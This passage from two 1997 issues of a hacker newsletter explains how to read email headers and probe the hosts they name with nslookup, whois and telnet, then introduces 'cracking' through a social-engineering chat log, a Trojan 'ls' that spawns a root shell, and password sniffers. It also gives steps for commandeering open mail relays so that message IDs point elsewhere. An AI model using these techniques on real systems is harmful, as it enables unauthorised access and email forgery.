Sorry, I haven't looked into how to do that with Internet Explorer. Oh, no, I can see the flames coming, how dare I not learn the ins and outs of IE mail! But, seriously, IE is a dangerously insecure Web browser because it is actually a Windows shell. So no matter how often Microsoft patches its security flaws, chances are you will be hurt by it one of these days. Just say "no" to IE. Another popular email program is Pegasus. Maybe there is an easy way to see full headers in Pegasus, but I haven't found it. The hard way to see full headers in Pegasus -- or IE -- or any email program -- is to open your mail folders with Wordpad. It is included in the Windows 95 operating system and is the best Windows editing program I have found for handling documents with lots of embedded control characters and other oddities. The Compuserve 3.01 email program automatically shows full headers. Bravo, Compuserve! Pine is the most popular email program used with Unix shell accounts. Since in order to be a real hacker you will sooner or later be using Unix, now may be a great time to start using Pine. ************************************************* Newbie note: Pine stands for Pine Is Not Elm, a tribute to the really, truly ancient Elm email program (which is still in use). Both Pine and Elm date back to ARPAnet, the US Defense Advanced Research Projects Agency computer network that eventually mutated into today's Internet. OK, OK, that was a joke. According to the official blurb, "PINE is the University of Washington's 'Program for Internet News and Email'." ************************************************* If you have never used Pine before, you may find it isn't as easy to use as those glitzy Windows email programs. But aside from its amazing powers, there is a really good reason to learn to compose email in Pine: you get practice using pico editor commands. If you want to be a real hacker, you will be using the pico editor (or another editor that uses similar commands) someday when you are writing programs in a Unix shell. To bring up Pine, at the cursor in your Unix shell simply type in "pine." In Pine, while viewing an email message, you may be able to see full headers by simply hitting the "h" key. If this doesn't work, you will have to go into the Setup menu to enable this command. To do this, go to the main menu and give the command "s" for Setup. Then in the Setup menu choose "c" for Config. On the second page of the Config menu you will see something like this: PINE 3.91 SETUP CONFIGURATION Folder: INBOX 2 Messages [ ] compose-rejects-unqualified-addrs [ ] compose-sets-newsgroup-without-confirm [ ] delete-skips-deleted [ ] enable-aggregate-command-set [ ] enable-alternate-editor-cmd [ ] enable-alternate-editor-implicitly [ ] enable-bounce-cmd [ ] enable-flag-cmd [X] enable-full-header-cmd [ ] enable-incoming-folders [ ] enable-jump-shortcut [ ] enable-mail-check-cue [ ] enable-suspend [ ] enable-tab-completion [ ] enable-unix-pipe-cmd [ ] expanded-view-of-addressbooks [ ] expanded-view-of-folders [ ] expunge-without-confirm [ ] include-attachments-in-reply ? Help E Exit Config P Prev - PrevPage X [Set/Unset] N Next Spc NextPage W WhereIs You first highlight the line that says "enable-full-header-command" and then press the "x" key. The give "e" to exit saving the change. Once you have done this, when you are reading your email you will be able to see full headers by giving the "h" command. Elm is another Unix email reading program. It actually gives slightly more detailed headers than Pine, and automatically shows full headers. WHAT DOES ALL THAT STUFF IN YOUR HEADERS MEAN? We'll start by taking a look at a mildly interesting full header. Then we'll examine two headers that reveal some interesting shenanigans. Finally we will look at a forged header. OK, let us return to that fairly ordinary full header we looked at above. We will decipher it piece by piece. First we look at the simple version: From: Vegbar Fubar Date: Fri, 11 Apr 1997 18:09:53 GMT To: hacker@techbroker.com The information within any header consists of a series of fields separated from each other by a "newline" character. Each field consists of two parts: a field name, which includes no spaces and is terminated by a colon; and the contents of the field. In this case the only fields that show are "From:," "Date:," and "To:". In every header there are two classes of fields: the "envelope," which contains only the sender and recipient fields; and everything else, which is information specific to the handling of the message. In this case the only field that shows which gives information on the handling of the message is the Date field. When we expand to a full header, we are able to see all the fields of the header. We will now go through this information line by line. Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id OAA07210; Fri, 11 Apr 1997 14:10:06 -0400 This line tells us that I downloaded this email from the POP server at a computer named o200.fooway.net. This was done on behalf of my account with email address of techbr@fooway.net. The (950413.SGI.8.6.12/951211.SGI) part identifies the software name and version running that POP server. ******************************************** Newbie note: POP stands for Post Office Protocol. Your POP server is the computer that holds your email until you want to read it. Usually your the email program on your home computer or shell account computer will connect to port 110 on your POP server to get your email. A similar, but more general protocol is IMAP, for Interactive Mail Access Protocol. Trust me, you will be a big hit at parties if you can hold forth on the differences between POP and IMAP, you big hunk of a hacker, you! (Hint: for more info, RTFRFCs.) ******************************************** Now we examine the second line of the header: Received: from ifi.foobar.no by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)for id OAA18967; Fri, 11 Apr 1997 14:09:58 -0400 Well, gee, I didn't promise that this header would be *totally* ordinary. This line tells us that a computer named ifi.foobar.no passed this email to the POP server on o200.fooway.net for someone with the email address of hacker@techbroker.com. This is because I am piping all email to hacker@techbroker.com into the account techbr@fooway.net. Under Unix this is done by setting up a file in your home directory named ".forward" with the address to which you want your email sent. Now there is a lot more behind this, but I'm not telling you. Heh, heh. Can any of you evil geniuses out there figure out the whole story? "ESMTP" stands for "extended simple mail transfer protocol." The "950413.SGI.8.6.12/951211.SGI" designates the program that is handling my email. Now for the next line in the header: Received: from gyllir.ifi.foobar.no (2234@gyllir.ifi.foobar.no [129.xxx.64.230]) by ifi.foobar.no with ESMTP (8.6.11/ifi2.4) id for ; Fri, 11 Apr 1997 20:09:56 +0200 This line tells us that the computer ifi.foobar.no got this email message from the computer gyllir.ifi.foobar.no. These two computers appear to be on the same LAN. In fact, note something interesting. The computer name gyllir.ifi.foobar.no has a number after it, 129.xxx.64.230. This is the numerical representation of its name. (I substituted ".xxx." for three numbers in order to fubar the IP address.) But the computer ifi.foobar.no didn't have a number after its name. How come? Now if you are working with Windows 95 or a Mac you probably can't figure out this little mystery. But trust me, hacking is all about noticing these little mysteries and probing them (until you find something to break, muhahaha -- only kidding, OK?) But since I am trying to be a real hacker, I go to my trusty Unix shell account and give the command: >nslookup ifi.foobar.no Server: Fubarino.com Address: 198.6.71.10 Non-authoritative answer: Name: ifi.foobar.no Address: 129.xxx.64.2 Notice the different numerical IP addresses between ifi.foobar.no and gyllir.ifi.foobar.no. Hmmm, I begin to think that the domain ifi.foobar.no may be a pretty big deal. Probing around with dig and traceroute leads me to discover lots more computers in that domain. Probing with nslookup in the mode "set type=any" tells me yet more. Say, what does that ".no" mean, anyhow? A quick look at the International Standards Organization (ISO) records of country abbreviations, I see "no" stands for Norway. Aha, it looks like Norway is an arctic land of fjords, mountains, reindeer, and lots and lots of Internet hosts. A quick search of the mailing list for Happy Hacker reveals that some 5% of its almost 4,000 email addresses have the .no domain. So now we know that this land of the midnight sun is also a hotbed of hackers! Who said headers are boring? On to the next line, which has the name and email address of the sender: From: Vegbar Fubar Received: from localhost (Vegbarha@localhost) by gyllir.ifi.foobar.no ; Fri, 11 Apr 1997 18:09:53 GMT I'm going to do some guessing here. This line says the computer gyllir.ifi.foobar.no got this email message from Vegbar Fubar on the computer "localhost." Now "localhost" is what a Unix computer calls itself. While in a Unix shell, try the command "telnet localhost." You'll get a login sequence that gets you right back into your own account. So when I see that gyllir.ifi.foobar.no got the email message from "localhost" I assume that means the sender of this email was logged into a shell account on gyllir.ifi.foobar.no, and that this computer runs Unix. I quickly test this hypothesis: > telnet gyllir.ifi.foobar.no Trying 129.xxx.64.230... Connected to gyllir.ifi.foobar.no. Escape character is '^]'. IRIX System V.4 (gyllir.ifi.foobar.no) Now Irix is a Unix-type operating system for Silicon Graphics Inc. (SGI) machines. This fits with the name of the POP server software on ifi.foobar.no in the header of (950413.SGI.8.6.12/951211.SGI). So, wow, we are looking at a large network of Norwegian computers that includes SGI boxes. We could find out just how many SGI boxes with patience, scanning of neighboring IP addresses, and use of the Unix dig and nslookup commands. Now you don't see SGI boxes just every day on the Internet. SGI computers are optimized for graphics and scientific computing. So I'm really tempted to learn more about this domain. Oftentimes an ISP will have a Web page that is found by directing your browser to its domain name. So I try out http://ifi.foobar.no. It doesn't work, so I try http://www.ifi.foobar.no. I get the home page for the University of Oslo Institutt for Informatikk. The Informatikk division has strengths in computer science and image processing. Now wonder people with ifi.foobar.no get to use SGI computers. Next I check out www.foobar.no and learn the University of Oslo has some 39,000 students. No wonder we find so many Internet host computers under the ifi.foobar.no domain! But let's get back to this header. The next line is pretty simple, just the date: Date: Fri, 11 Apr 1997 18:09:53 GMT But now comes the most fascinating line of all in the header, the message ID: Message-Id: <199704111809.13156.gyllir@ifi.foobar.no> The message ID is the key to tracking down forged email. Avoiding the creation of a valid message ID is the key to using email for criminal purposes. Computer criminals go to a great deal of effort to find Internet hosts on which to forge email that will leave no trace of their activities through these message IDs. The first part of this ID is the date and time. 199704111809 means 1997, April 11, 18:08 (or 6:08 PM). Some message IDs also include the time in seconds. Others may leave out the "19" from the year. The 13156 is a number identifying who wrote the email, and gyllir@ifi.foobar.no refers to the computer, gyllir within the domain ifi.foobar.no, on which this record is stored. Where on this computer are the records of the identities of senders of email stored? Now Unix has many variants, so I'm not going to promise these records will be in a file of the same name in every Unix box. But often they will be in either the syslog files or usr/spool/mqueue. Some sysadmins will archive the message IDs in case they need to find out who may have been abusing their email system. But the default setting for some systems, for example those using sendmail, is to not archive. Unfortunately, an Internet host that doesn't archive these message IDs is creating a potential haven for email criminals. Now we will leave the University of Norway and move on to a header that hides a surprise. Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for ; Sun, 27 Apr 1997 23:07:01 GMT Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400 Message-Id: <2.2.16.19970428082132.2cdf544e@fubar.com> X-Sender: cmeinel@fubar.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: galfina@Fubarino.com From: "Carolyn P. Meinel" Subject: Sample header Date: 27 Apr 1997 22:53:37 -0400 Let's look at the first line: Received: from NIH2WAAF (mail6.foo1.csi.com [149.xxx.183.75]) by Fubarino.com (8.8.3/8.6.9) with ESMTP id XAA20854 for ; Sun, 27 Apr 1997 23:07:01 GMT This first line tells us that it was received by the email account "galfina@Fubarino.com". That's the "for " part. The Internet host computer that sent the email to galfina was mail6.foo1.csi.com [149.xxx.183.75]. This computer name is given first in a form easily (ha, hah!) read by humans followed by the version of its name that a computer can more easily translate into the 0's and 1's that computers understand. "Galfina" is my user name. I chose it in order to irritate G.A.L.F. (Gray Areas Liberation Front). "Fubarino.com (8.8.3/8.6.9)" is the name of the computer that received the email for my galfina account. But notice it is a very partial computer name. All we get is a domain name and not the name of the computer from which I download my email. We can guess that Fubarino.com is not the full name because Fubarino is a big enough ISP to have several computers on a LAN to serve all its users. ************************************************** Evil genius tip: Want to find out the names of some of the computers on your ISP's LAN? Commands that can dredge some of them up include the Unix commands traceroute, dig, and who. For example, I explored the Fubarino.com LAN and found free.Fubarino.com (from command "dig Fubarino.com"); and then dialin.Fubarino.com and milnet.Fubarino.com (from "who" given while logged in my galfina account) Then using the numerical addresses given from the dig command with these names of Fubarino.com computers I then was able, by checking nearby numbers, to find a whole bunch more names of Fubarino.com computers. ************************************************** The number after Fubarino.com is not a numerical IP address. It is the designation of the version of the mail program it runs. We can guess from these numbers 8.8.3/8.6.9 that it refers to the Sendmail program. But just to make sure, we try the command "telnet Fubarino.com 25." This gives us the answer: 220 Fubarino.com ESMTP Sendmail 8.8.3/8.6.9 ready at Mon, 28 Apr 1997 09:55:58 GMT So from this we know Fubarino.com is running the Sendmail program. ************************************************** Evil genius tip: Sendmail is notorious for flaws that you can use to gain root access to a computer. So even though Fubarino.com is using a version of sendmail that has been fixed from its most recently publicized security holes, if you are patient a new exploit will almost certainly come out within the next few months. The cure for this problem may possibly be to run qmail, which so far hasn't had embarrassing problems. ************************************************** OK, now let's look at the next "received" line in that header: Received: from CISPPP - 199.xxx.193.176 by csi.com with Microsoft SMTPSVC; Sun, 27 Apr 1997 22:53:36 -0400 CISPPP stands for Compuserve Information Services point to point protocol (PPP) connection. This means that the mail was sent from a PPP connection I set up through Compuserve. We also see that Compuserve uses the Microsoft SMTPSVC mail program. However, we see from the rest of the header that the sender (me) didn't use the standard Compuserve mail interface: Message-Id: <2.2.16.19970428082132.2cdf544e@fubaretta.com> The number 2.2.16. was inserted by Eudora, and means I am using Eudora Pro 2.2, 16-bit version. The 19970428082132 means the time I sent the email, in order of year (1997), month (04), day (28) and time (08:31:32). The portion of the message ID "2cdf544e@fubaretta.com" is the most important part. That is provided by the Internet host where a record of my use of fubaretta's mail server has been stored. Did you notice this message ID was not stored with Compuserve, but rather with fubaretta.com? This is, first of all, because the message ID is created with the POP server that I specified with Eudora. Since Compuserve does not yet offer POP servers, I can only use Eudora to send email over a Compuserve connection but not to receive Compuserve email. So, heck, I can specify an arbitrary POP server when I send email over Compuserve from Eudora. I picked the Fubaretta ISP. So there! If I were to have done something bad news with that email such as spamming, extortion or email bombing, the sysadmin at fubaretta.com would look up that message ID and find information tying that email to my Compuserve account. That assumes, of course, that fubaretta.com is archiving message IDs. So when you read this part of the header you might think that the computer where I pick up my email is with the Fubaretta.com ISP. But all this really means is that I specified to Eudora that I was using a mail account at Fubar. But if I had put a different account name there, then I would have generated a different message ID. Did I need to have an account at Fubaretta? No. The mail server did not ask for a password. In fact, I don't have an account at Fubaretta. The rest of the header is information provided by Eudora: X-Sender: cmeinel@fubar.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" The "X-Mailer" information tells you I was using the 16 bit version of Windows Eudora Pro Version 2.2. Some people have asked me why I don't use the 32 bit version (which runs on Win 95) instead of the 16 bit version. Answer: better error handling! That's the same reason I don't normally use Pegasus. Also, Eudora lets me get away with stuph:) Mime (Multipurpose Internet Mail Extensions)is a protocol to view email. Those of you who got lots of garbage when I sent out GTMHH and Digest can blame it on Mime. If your email program doesn't use Mime, you get lots of stuff like "=92" instead of what I tried to send. But this time I turned off the "printed quotable" feature in Eudora. So this time I hope I sent all you guys plain, friendly ASCII. Please email me if what you got was still messed up, OK? The character set "us-ascii" tells us what character set this email will use. Some email uses ISO ascii instead, generally if it originates outside the US. Now let's look at a slightly more exciting header. In fact, this is a genuine muhahaha header. Remember that war I declared on Web sites that provide downloads of email bombing programs? You know, those Windows 95 for lusers programs that run from a few mouse clicks? Here's a header that reveals my tiny contribution toward making life unpleasant for the ISPs that distribute these programs. It's from the Happy Hacker Digest, April 12, 1997, from a copy that reached a test email address I had on the list: Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400 Date: Mon, 14 Apr 1997 12:05:22 -0400 Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400 Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700 Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net> X-Sender: techbr@mail.fooway.net (Unverified) X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" To: (Recipient list suppressed) From: "Carolyn P. Meinel" Subject: Happy Hacker Digest April 12, 1997 Now let's examine the first field: Received: by o200.fooway.net (950413.SGI.8.6.12/951211.SGI)for techbr@fooway.net id MAA07059; Mon, 14 Apr 1997 12:05:25 -0400 Date: Mon, 14 Apr 1997 12:05:22 -0400 We already looked at this computer o200.fooway.net above. But, heck, let's probe a little more deeply. Since I suspect this is a POP server, I'm going to telnet to port 110, which is normally the POP server port. > telnet o200.fooway.net 110 Trying 207.xxx.192.57... Connected to o200.fooway.net. Escape character is '^]'. +OK QUALCOMM Pop server derived from UCB (version 2.1.4-R3) at mail starting. Now we know more about Fooway Technology's POP server. If you have ever run one of those hacker "strobe" type programs that tell you what programs are running on each port of a computer, there is really no big deal to it. They just automate the process that we are doing here by hand. But in my humble opinion you will learn much more by strobing ports by hand the same way I am doing here. Now we could do lots more strobing, but I'm getting bored. So we check out the second field in this header: Date: Mon, 14 Apr 1997 12:05:22 -0400 That -0400 is a time correction. But to what is it correcting? Let's see the next field in the header: Received: from mocha.icefubarnet.com by o200.fooway.net via ESMTP (950413.SGI.8.6.12/951211.SGI) for id MAA06380; Mon, 14 Apr 1997 12:05:20 -0400 Hmmm, why is mocha.icefubarnet.com in the header? If this header isn't forged, it means this mail server was handling the Happy Hacker Digest mailing. So where is mocha.icefubarnet.com located? A quick use of the whois command tells us: > whois icefubarnet.com ICEFUBARNET INTERNET, INC (ICEFUBARNET-DOM) 2178 Fooway North Bar, Oregon 97xxx USA Now this is located four time zones earlier than the computer o200.fooway.net. So this explains the time correction notation of -0400. Next field on the header tells us: Received: from cmeinel (hd14-211.foo.compuserve.com [206.xxx.205.211]) by mocha.icefubarnet.com (Netscape Mail Server v2.01) with SMTP id AAP3428; Mon, 14 Apr 1997 08:51:02 -0700 This tells us that the Happy Hacker Digest was delivered to the mail server (SMTP stands for simple mail transport protocol) at mocha.icefubarnet.com by Compuserve. But, and this is very important to observe, once again I did not use the Compuserve mail system. This merely represents a PPP session I set up with Compuserve. How can you tell? Playing with nslookup shows that the numerical representation of my Compuserve connection isn't an Internet host. But you can't learn much more easily because Compuserve has great security -- one reason I use it. But take my word for it, this is another way to see a Compuserve PPP session in a header. Now we get to the biggie, the message ID: Message-Id: <2.2.16.19970414100122.4387d20a@mail.fooway.net> Whoa, how come that ID is at the computer mail.fooway.net? It's pretty simple. In Eudora I specified my POP server as mail.fooway.net. But if you were to do a little stobing, you would discover that while fooway.net has a POP server, it doesn't have an SMTP or ESMTP server. You can get mail from Fooway, but you can't mail stuff out from Fooway. But the marvelous workings of the Internet combined with the naivete of the Eudora Pro 2.2 program sent my message ID off to mail.fooway.net anyhow. On the message ID, the "2.2.16" was inserted by Eudora. That signifies it is the 2.2 version for a 16 bit operating system. The remaining fields of the header were all inserted by Eudora: X-Sender: techbr@mail.fooway.net (Unverified) X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" To: (Recipient list suppressed) From: "Carolyn P. Meinel" Subject: Happy Hacker Digest April 12, 1997 Notice Eudora does let us know that techbr@mail.fooway.net is unverified as sender. And in fact, it definitely is not the sender. This is a very important fact. The message ID of an email is not necessarily stored with the computer that sent it out. So how was I able to use Icefubarnet Internet's mail server to send out the Happy Hacker Digest? Fortunately Eudora's naivete makes it easy for me to use any mail server that has an open SMTP or ESMTP port. You may be surprised to discover that there are uncountable Internet mail servers that you may easily commandeer to send out your email -- if you have the right program -- or if you know how to telnet to port 25 (which runs using the SMTP or ESMTP protocols) and give the commands to send email yourself. Why did I use Icefubarnet? Because at the time it was hosting an ftp site that was being used to download email bomber programs (http://www.icefubarnet.com/~astorm/uy4beta1.zip). Last time I checked the owner of the account from which he was offering this ugly stuff was unhappy because Icefubarnet Internet had made him take it down. But -- back to how to commandeer mail servers while sending your message Ids elsewhere. In Eudora, just specify your victim mail server under the hosts section of the options menu (under tools). Then specify the computer to which you want to send your message ID under "POP Server." But if you try any of this monkey business with Pegasus, it gives a nasty error message accusing you of trying to forge email. Of course you can always commandeer mail servers by writing your own program to commander mail servers. But that will be covered in the upcoming GTMHH on shell programming. ********************************************* Newbie note: Shell programming? What the heck izzat? It means writing a program that uses a sequence of commands available to you in your Unix shell. If you want to be a real hacker, you *must* learn Unix! If you are serious about continuing to study these GTMHHs, you *must* either get a shell account or install some form of Unix on your home computer. You may find places where you can sign up for shell accounts through http://www.celestin.com/pocia/. Or email haxorshell@techbroker.com for information on how to sign up with a shell account that is friendly to hackers and that you may securely telnet into from your local ISP PPP dialup. ********************************************* Hang, on, Vol. 3 Number 5 will get into the really hairy stuff: how to do advanced deciphering of forged headers. Yes, how to catch that 31137 d00d who emailbombed you or spammed you! Happy Hacking, and be good! _________________________________________________________ Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe" Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. ________________________________________________________ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 5 The Dread GTMHH on Cracking ____________________________________________________________ Nowadays if you ask just about anyone what a hacker is, he or she will tell you "a person who breaks into computers." That is partly on account of news stories which make it seem like the only thing a hacker does is commit computer crime. But there also is some truth to the public view. An obsession with breaking into computers has swept the hacker world. In fact, lots of hackers make fun of the kinds of stuff I think is fun: forging email and Usenet posts and programming Easter eggs into commercial software and creating Win 95 bootup screens that say "Bill Gates' mother wears army boots." But since everyone and his brother has been emailing me pleading for instructions on how to break into computers, here it is. The dread GTMHH on Cracking. Yes, you, too, can become a genuine computer cracker and make everyone quake in his or her boots or slippers or whatever footgear they are wearing lately. "But, but," you say. "This list is for *legal* hacking. Sez right here in the welcome message you sent me when I signed up." Welcome to reality, Bub. Hackers fib sometimes. ************************************************ You can go to jail warning: Almost everywhere on the planet, breaking into a computer is illegal. The only exceptions are breaking into your own computer, or breaking into a computer whose owner has given you permission to try to break in. It doesn't matter if you are just quietly sneaking around doing no harm. It doesn't matter if you make some stranger's computer better. You're still in trouble if you break in without permission. ************************************************ Honestly, this Guide really *is* about harmless hacking. You don't have to commit a crime to crack into a computer. From time to time hardy souls offer up their computers for their friends, or sometimes even the entire world, as targets for cracking. If you have permission from the owner of a computer, it is most definitely legal to break into it. In fact, here's a really fun computer that you have permission to break into. Damien Sorder invites you to break into his Internet host computer obscure.sekurity.org. But how do you know whether this or any other announcement of a cracker welcome mat is legitimate? How do you know I'm not just playing a mean old trick on Damien by sending out an invitation to break into his box to the 5,000 crazed readers of the Happy Hacker list? Here's a good way to check the validity of offers to let anyone try to break into a computer. Get the domain name of the target computer, in this case obscure.sekurity.org. Then add "root@" to the domain name, for example root@obscure.sekurity.org. Email the owner of that computer. Ask him if I was fibbing about his offer. If he says I made it up, tell him he's just chicken, that if he was a real hacker he'd be happy to have thousands of clueless newbies running Satan against his box. Just kidding:) Actually, in this case you may email info@sekurity.org for more details on Damien's offer to let one and all try to crack his box. Also, please be good guys and attack off hours (Mountain Daylight Savings Time, US) so he can use obscure.sekurity.org for other stuff during the day. Also, Damien requests "If you (or anyone) want to try to hack obscure, please mail root@sekurity.org and mention that you are doing it, and what domain you are coming from. That way I can distinguish between legit and real attacks." We all owe you thanks, Damien, for providing a legal target for the readers of this GTMHH to test their cracking skills. So let's assume that you have chosen a legitimate target computer to try to break into. What? Some guys say it's too hard to break into a fortified box like obscure.sekurity.org? They say it's more fun to break into a computer when they're breaking the law? They say to be a Real Hacker you must run around trashing the boxes of the cringing masses of Internet hosts? Haw, haw, sendmail 4.0! What lusers, they say. They sure taught those sendmail 4.0 dudes a lesson, right? I say that those crackers who go searching for vulnerable computers and breaking into them are like Lounge Lizard Larry going into a bar and picking up the drunkest, ugliest gal (or guy) in the place. Yeah, we all are sure impressed. If you want to be a truly elite cracker, however, you will limit your forays to computers whose owners consent to your explorations. This can -- should!-- include your own computer. So with this in mind -- that you want more from life than to be the Lounge Lizard Larry of the hacker world -- here are some basics of breaking into computers. There are an amazing number of ways to break into computers. The simplest is to social engineer your way in. This generally involves lying. Here's an example. ********************************************* From: Oracle Service Humour List Subject: HUM: AOL Hacker Turnaround (***) Read Newfpyr's masterful turning of the tables on a hacker... Certainly one of the best Absurd IMs we've EVER received! Newfpyr's comments are in brackets throughout. Zabu451: Hello from America Online! I'm sorry to inform you that there has been an error in the I/O section of your account database, and this server's password information has been temporarily destroyed. We need you, the AOL user, to hit reply and type in your password. Thank you for your help. Newfpyr: Hello! This is Server Manager #563. I'm sorry to hear that your server has lost the password info. I mean, this has been happening too much lately. We have developed some solutions to this problem. Have you got the mail sent out to all server managers? Zabu451: no NewfPyr: Really? Ouch. There's been some problems with the server mailer lately. Oh, well. Here's a solution to this problem: try connecting your backup database to your main I/O port, then accessing the system restart. Zabu451: no i still need passwords NewfPyr: I see. Do you want me to send you the list of all the passwords of all the screen names of your server? Zabu451: ya i want that NewfPyr: Let me get the server manager to send it... NewfPyr: He says I need your server manager password. Could you please type it in? Zabu451: i dont have one NewfPyr: What do you mean? That's the first thing every manager gets! Zabu451: it got deleted NewfPyr: Wow! You must be having a lot of trouble. Let me find out what server you're using... [Note: I checked his profile. It said he was from Springfield, Mass.] NewfPyr: Okay, your number has been tracked to an area in Springfield, Mass. Zabu451: how did u know?!!!?!?!!?!?!?!?!??!! NewfPyr: I used Server Tracker 5.0 . Don't you have it? Zabu451: do you know my address!?!?!?!!?!? NewfPyr: Of course not. Zabu451: good NewfPyr: I only know the number you're calling AOL from, which is from your server, right? Zabu451: yes NewfPyr: Good. Okay, now that we have your number, we have your address, and we are sending a repair team over there. Zabu451: nonononono dont stop them now NewfPyr: Why? Isn't your server down? Zabu451: nonono its working now NewfPyr: They're still coming, just in case. Zabu451: STOP THEM NOW NewfPyr: I can't break AOL Policy. Zabu451: POEPLE ARE COMING TO MY HOUSE?!?!?!?!?? NewfPyr: No! To your server. You know, where you're calling AOL from. Zabu451: im calling from my house NewfPyr: But you said you where calling from the server! Zabu451: i lied im not reely a server guy NewfPyr: But you said you were! Zabu451: i lied i trying to get passwords please make them stop NewfPyr: Okay. The repair team isn't coming anymore. Zabu451: good NewfPyr: But a team of FBI agents is. Zabu451: NONONONO Zabu451: im sorry Zabu451: ill never do it again please make them not come Zabu451: PLEASE IL STOP ASKING FOR PASSWORDS FOREVER PLEASE MAKE THEM STOP!! NewfPyr: I'm sorry, I can't do that. They should be at your house in 5 minutes. Zabu451: IM SORRY IL DO ANYTHING PLEASE I DONT WANT THEM TO HURT ME Zabu451: PLEASE Zabu451: PLEEEEEEEEEEEEEEAAAAAAAAASSSSSSSSE NewfPyr: They won't hurt you! You'll probably only spend a year of prison. Zabu451: no IM ONLY A KID NewfPyr: You are? That makes it different. You won't go to prison for a year. Zabu451: i thout so NewfPyr: You'll go for two years. Zabu451: No! IM SORRY Zabu451: PLEASE MAKE THEM STOP Zabu451: PLEASE [I thought this was enough. He was probably wetting his pants.] NewfPyr: Since this was a first time offense, I think I can drop charges. Zabu451: yea Zabu451: thankyouthankyouthankyou NewfPyr: The FBI agents have been withdrawn. If you ever do it again, we'll bump you off. Zabu451: i wont im sorry goodbye [He promptly signed off.] One of the RARE RARE occasions that we've actually felt sorry for the hacker. SEVENTY FIVE TOKENS to you, NewfPyr! We're STILL laughing - thanks a lot! Submitted by: Fran C. M. T. @ aol.com (Want more of this humor in a jugular vein? Check out http://www.netforward.com/poboxes/?ablang) ***************************************** Maybe you are too embarrassed to act like a typical AOL social engineering hacker. OK, then maybe you are ready to try the Trojan Horse. This is a type of attack wherein a program that appears to do something legitimate has been altered to attack a computer. For example, on a Unix shell account you might put a Trojan in your home directory named "ls." Then you tell tech support that there is something funny going on in your home directory. If the tech support guy is sufficiently clueless, he may go into you account while he has root permission. He then gives the command "ls" to see what's there. According to Damien Sorder, "This will only work depending on his 'PATH' statement for his shell. If he searches '.' before '/bin', then it will work. Else, it won't." Presuming the sysadmin has been this careless, and if your Trojan is well written, it will call the real ls program to display your file info -- while also spawning a root shell for your very own use! *************************************************** Newbie note: if you can get into a root shell you can do anything -- ANYTHING -- to your victim computer. Alas, this means it is surprisingly easy to screw up a Unix system while operating as root. A good systems administrator will give him or herself root privileges only when absolutely necessary to perform a task. Trojans are only one of the many reasons for this caution. Before you invite your friends to hack your box, be prepared for anything, and I mean ANYTHING, to get messed up even by the most well-meaning of friends. *************************************************** Another attack is to install a sniffer program on an Internet host and grab passwords. What this means is any time you want to log into a computer from another computer by using telnet, your password is at the mercy of any sniffer program that may be installed on any computer through which your password travels. However, to set up a sniffer you must be root on the Unix box on which it is installed. So this attack is clearly not for the beginner. To get an idea of how many computers "see" your password when you telnet into your remote account, give the command (on a Unix system) of "traceroute my.computer" (it's "tracert" in Windows 95) where you substitute the name of the computer you were planning to log in on for the "my.computer." Sometimes you may discover that when you telnet from one computer to another even within the city you live in, you may go through a dozen or more computers! For example, when I trace a route from an Albuquerque AOL session to my favorite Linux box in Albuquerque, I get: C:\WINDOWS>tracert fubar.com Tracing route to fubar.com [208.128.xx.61] over a maximum of 30 hops: 1 322 ms 328 ms 329 ms ipt-q1.proxy.aol.com [152.163.205.95] 2 467 ms 329 ms 329 ms tot-ta-r5.proxy.aol.com [152.163.205.126] 3 467 ms 323 ms 328 ms f4-1.t60-4.Reston.t3.ans.net [207.25.134.69] 4 467 ms 329 ms 493 ms h10-1.t56-1.Washington-DC.t3.ans.net [140.223.57 .25] 5 469 ms 382 ms 329 ms 140.222.56.70 6 426 ms 548 ms 437 ms core3.Memphis.mci.net [204.70.125.1] 7 399 ms 448 ms 461 ms core2-hssi-2.Houston.mci.net [204.70.1.169] 8 400 ms 466 ms 512 ms border7-fddi-0.Houston.mci.net [204.70.191.51] 9 495 ms 493 ms 492 ms american-comm-svc.Houston.mci.net [204.70.194.86 ] 10 522 ms 989 ms 490 ms webdownlink.foobar.net [208.128.37.98] 11 468 ms 493 ms 491 ms 208.128.xx.33 12 551 ms 491 ms 492 ms fubar.com [208.128.xx.61] If someone were to put a sniffer on any computer on that route, they could get my password! Now do you want to go telneting around from one of your accounts to another? A solution to this problem is to use Secure Shell. This is a program you can download for free from http://escert.upc.es/others/ssh/. According to the promotional literature, "Ssh (Secure Shell) is a program to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another. It provides strong authentication and secure communications over insecure channels." If you want to get a password on a computer that you know is being accessed remotely by people using Windows 3.X, and if it is using Trumpet Winsock, and if you can get physical access to that Windows box, there is a super easy way to uncover the password. You can find the details, which are so easy they will blow your 